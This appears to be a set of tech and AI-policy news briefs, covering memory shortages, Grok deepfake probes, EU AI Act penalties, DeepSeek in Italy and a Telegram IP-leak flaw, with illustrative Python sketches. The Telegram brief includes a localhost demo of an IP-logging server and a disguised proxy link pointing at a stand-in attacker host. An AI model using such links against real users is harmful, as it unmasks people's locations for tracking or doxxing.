UK-based microcomputer manufacturer Raspberry Pi Holdings plc announced that surging demand for dynamic random access memory (DRAM) from AI data centres is tightening the supply of key components used in its products, leading to heightened uncertainty about future trading.
Investors reacted negatively, with shares sliding about 7.5 percent on the London Stock Exchange after the company’s warning that memory pricing and availability may remain constrained beyond the first half of 2026.
Raspberry Pi stressed that it has taken steps to mitigate the situation, including qualifying additional suppliers, developing lower-memory products and raising prices, and that it maintains sufficient inventory for the near term.
The company also reported that adjusted earnings for 2025 were ahead of market forecasts, supported by strong unit shipments. However, it highlighted ‘limited visibility’ for the second half of 2026 and beyond due to the unpredictable memory supply landscape.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
Ireland’s Data Protection Commission is owed more than €4 billion in fines imposed on companies, primarily Big Tech firms. Most of the penalties remain unpaid due to ongoing legal challenges.
Figures released under Freedom of Information laws show the watchdog collected only €125,000 from over €530 million in fines issued last year. Similar patterns have persisted across several previous years.
Since 2020, the commission has levied €4.04 billion in data protection penalties. Just €20 million has been paid, while the remaining balance is tied up in appeals before Irish and EU courts.
The regulator states that legislation prevents enforcement until the court proceedings conclude. Several cases hinge on a pending ruling in the WhatsApp case before the EU's top court, which is expected to shape future collections.
Körber Supply Chain and Sereact have formed a strategic partnership to bring AI-controlled pick-and-place robotics technology into automated production and distribution solutions.
The collaboration aims to overcome the limitations of conventional automation by using AI systems that analyse visual and object data in real time and autonomously adjust picking strategies for a wide variety of products.
The Sereact solution is now part of Körber’s broader supply chain ecosystem, enabling companies to integrate flexible and scalable robot automation into their warehouse and logistics operations.
AI-enabled robots can handle unknown or complex items with precision and speed, making logistics processes more efficient and reducing reliance on manual labour.
A Northern Ireland politician, Cara Hunter of the Social Democratic and Labour Party (SDLP), has quit X after renewed concerns over Grok AI misuse. She cited failures to protect women and children online.
The decision follows criticism of Grok AI features enabling non-consensual sexualised images. UK regulators have launched investigations under online safety laws.
UK ministers plan to criminalise creating intimate deepfakes and supplying related tools. Ofcom is examining whether X breached its legal duties.
Political leaders and rights groups say enforcement must go further. X says it removes illegal content and has restricted Grok image functions on the platform.
Personal finance assistants powered by AI tools are increasingly helping users manage budgets, analyse spending, and organise financial documents. Popular platforms such as ChatGPT, Google Gemini, Microsoft Copilot, and Claude now offer features designed to support everyday financial tasks.
Rather than focusing on conversational style, users should consider how financial data is accessed and how each assistant integrates with existing systems. Connections to spreadsheets, cloud storage, and secure platforms often determine how effective AI tools are for managing financial workflows.
ChatGPT is commonly used for drafting financial summaries, analysing expenses, and creating custom tools through plugins. Google Gemini is closely integrated with Google Docs and Sheets, making it suitable for users who rely on Google’s productivity ecosystem.
Microsoft Copilot provides strong automation for Excel and Microsoft 365 users, with administrative controls that appeal to organisations. Claude focuses on safety and large context windows, allowing it to process lengthy financial documents with more conservative output.
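As a minimal illustration of the kind of spending analysis these assistants automate, the sketch below groups transactions by category and formats the totals as a prompt that could be pasted into any of the platforms above. All transaction data and function names are invented for the example; no specific assistant API is assumed.

```python
from collections import defaultdict

# Hypothetical transaction records: (description, category, amount)
transactions = [
    ("Grocery store", "food", 54.20),
    ("Streaming subscription", "entertainment", 11.99),
    ("Grocery store", "food", 23.75),
    ("Electricity bill", "utilities", 88.40),
]

def summarise_spending(records):
    """Total spending per category, sorted from largest to smallest."""
    totals = defaultdict(float)
    for _, category, amount in records:
        totals[category] += amount
    return dict(sorted(totals.items(), key=lambda kv: -kv[1]))

def build_prompt(totals):
    """Format the category totals as a prompt an AI assistant could analyse."""
    lines = [f"- {cat}: €{amt:.2f}" for cat, amt in totals.items()]
    return ("Here is my monthly spending by category:\n"
            + "\n".join(lines)
            + "\nSuggest where I could cut costs.")

totals = summarise_spending(transactions)
print(build_prompt(totals))
```

In practice the structured summary, not the raw bank export, is what gets shared with the assistant, which keeps the prompt short and limits the personal data exposed.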
Choosing the most suitable AI tools for personal finance depends on workflow needs, data governance preferences, and privacy considerations. No single platform dominates every use case; each offers strengths across different financial management tasks.
The Irish government plans to fast-track laws allowing heavy fines for AI abuse. The move follows controversy involving misuse of image generation tools.
Ministers will transpose the EU AI Act into Irish law. The framework defines eight harmful uses breaching rights and public decency.
Penalties could reach €35 million or seven percent of global annual turnover. AI systems would be graded by risk under the enforcement regime.
A dedicated AI office is expected to launch by August to oversee compliance. Irish and UK leaders have pressed platforms to curb harmful AI features.
A cyberattack on Kensington and Chelsea Council has exposed the growing vulnerability of UK government organisations to data breaches. The council stated that personal details linked to hundreds of thousands of residents may have been compromised after attackers targeted shared IT infrastructure.
Security experts warn that interconnected systems, while cost-efficient, create systemic risks. Dray Agha, senior manager of security operations at Huntress, said a single breach can quickly spread across partner organisations, disrupting essential services and exposing sensitive information.
Public sector bodies remain attractive targets due to ageing infrastructure and the volume of personal data they hold. Records such as names, addresses, national ID numbers, health information, and login credentials can be exploited for fraud, identity theft, and large-scale scams.
Gregg Hardie, public sector regional vice president at SailPoint, noted that attackers often employ simple, high-volume tactics rather than sophisticated techniques. Compromised credentials allow criminals to blend into regular activity and remain undetected for long periods before launching disruptive attacks.
Hardie said stronger identity security and continuous monitoring are essential to prevent minor intrusions from escalating. Investing in resilient, segmented systems could help reduce the impact of future public sector cyberattacks and protect critical operations.
The European Commission has warned X to address issues related to its Grok AI tool. Regulators say new features enabled the creation of sexualised images, including those of children.
EU Tech Sovereignty Commissioner Henna Virkkunen has stated that investigators have already taken action under the Digital Services Act. Failure to comply could result in enforcement measures being taken against the platform.
X recently restricted Grok’s image editing functions to paying users after criticism from regulators and campaigners. Irish and EU media watchdogs are now engaging with Brussels on the issue.
UK ministers also plan laws banning non-consensual intimate images and tools enabling their creation. Several digital rights groups argue that existing laws already permit criminal investigations and fines.
Chinese AI start-up DeepSeek will launch a customised Italian version of its online chatbot following a probe by the Italian competition authority, the AGCM. The move follows months of negotiations and a temporary 2025 ban due to concerns over user data and transparency.
The AGCM had criticised DeepSeek for not sufficiently warning users about hallucinations or false outputs generated by its AI models.
The probe ended after DeepSeek agreed to clearer Italian disclosures and technical fixes to reduce hallucinations. The regulator noted that while improvements are commendable, hallucinations remain a global AI challenge.
DeepSeek now provides longer Italian-language warnings and detects Italian IP addresses or Italian-language prompts in order to serve localised notices. The company also plans workshops to ensure staff understand Italian consumer law and has submitted multiple proposals to the AGCM since September 2025.
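DeepSeek's actual detection logic has not been published, but a locale check of this kind might look roughly like the sketch below. The IP range, the marker words, and the disclaimer text are all illustrative assumptions, not the company's real implementation.

```python
import ipaddress

# Illustrative placeholder for IP ranges allocated to Italian ISPs
# (example range only; a real system would use a geolocation database).
ITALIAN_NETWORKS = [ipaddress.ip_network("151.0.0.0/10")]

DISCLAIMERS = {
    "it": ("Attenzione: questo modello può generare informazioni errate "
           "(cosiddette allucinazioni). Verifica sempre le risposte."),
    "default": "Warning: this model may generate incorrect information.",
}

def looks_italian(ip: str, prompt: str) -> bool:
    """Trigger the localised notice on an Italian IP or an Italian-language prompt."""
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in ITALIAN_NETWORKS):
        return True
    # Crude language heuristic, for illustration only.
    italian_markers = {"ciao", "perché", "grazie", "cosa"}
    return any(word in prompt.lower() for word in italian_markers)

def disclaimer_for(ip: str, prompt: str) -> str:
    """Pick the Italian disclaimer when either signal fires, else the default."""
    return DISCLAIMERS["it"] if looks_italian(ip, prompt) else DISCLAIMERS["default"]
```

Either signal alone is enough to trigger the localised notice, which matches the "IP addresses or prompts" framing in the regulator's summary.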
The start-up must provide a progress report within 120 days. Failure to meet the regulator’s requirements could lead to the probe being reopened and fines of up to €10 million (£8.7m).
A newly identified vulnerability in Telegram’s mobile apps allows attackers to reveal users’ real IP addresses with a single click. The flaw, known as a ‘one-click IP leak’, can expose location and network details even when VPNs or proxies are enabled.
The issue comes from Telegram’s automatic proxy testing process. When a user clicks a disguised proxy link, the app initiates a direct connection request that bypasses all privacy protections and reveals the device’s real IP address.
Cybersecurity researcher @0x6rss demonstrated the attack in a post on X, showing that a single click is enough to log a victim’s real IP address. The request behaves similarly to known Windows NTLM leaks, where background authentication attempts expose identifying information without explicit user consent.
Attackers can embed malicious proxy links in chats or channels, masking them as standard usernames. Once clicked, Telegram silently runs the proxy test, bypasses VPN or SOCKS5 protections, and sends the device’s real IP address to the attacker’s server, enabling tracking, surveillance, or doxxing.
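To illustrate the mechanism, the sketch below stands in for an attacker-controlled endpoint: whatever server appears in a disguised `tg://proxy?server=…&port=…` link simply logs the connecting client's IP when the app auto-tests the proxy. Both the listener and the local client that plays the victim's app are illustrative; this is a minimal demonstration of the logging side, not Telegram's code.

```python
import socket
import threading

def run_logging_server(host="127.0.0.1", port=0):
    """Accept one connection and record the connecting peer's IP address."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, port))
    srv.listen(1)
    result = {}

    def accept_once():
        conn, peer = srv.accept()
        result["peer_ip"] = peer[0]  # the client's real source IP
        conn.close()

    t = threading.Thread(target=accept_once, daemon=True)
    t.start()
    return srv, t, result

srv, t, result = run_logging_server()
port = srv.getsockname()[1]

# A disguised link such as tg://proxy?server=attacker.example&port=443&secret=...
# would cause the victim's app to open exactly this kind of direct connection:
client = socket.create_connection(("127.0.0.1", port))
t.join(timeout=2)
client.close()
srv.close()
print("Logged peer IP:", result["peer_ip"])  # → 127.0.0.1 in this local demo
```

The key point is that the connection is made directly by the app, outside any VPN or SOCKS5 tunnel the user configured inside Telegram, so the source address the "proxy" sees is the device's real IP.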
Both Android and iOS versions are affected, putting millions of privacy-focused users at risk. Researchers recommend avoiding unknown links, turning off automatic proxy detection where possible, and using firewall tools to block outbound proxy tests. Telegram has not publicly confirmed a fix.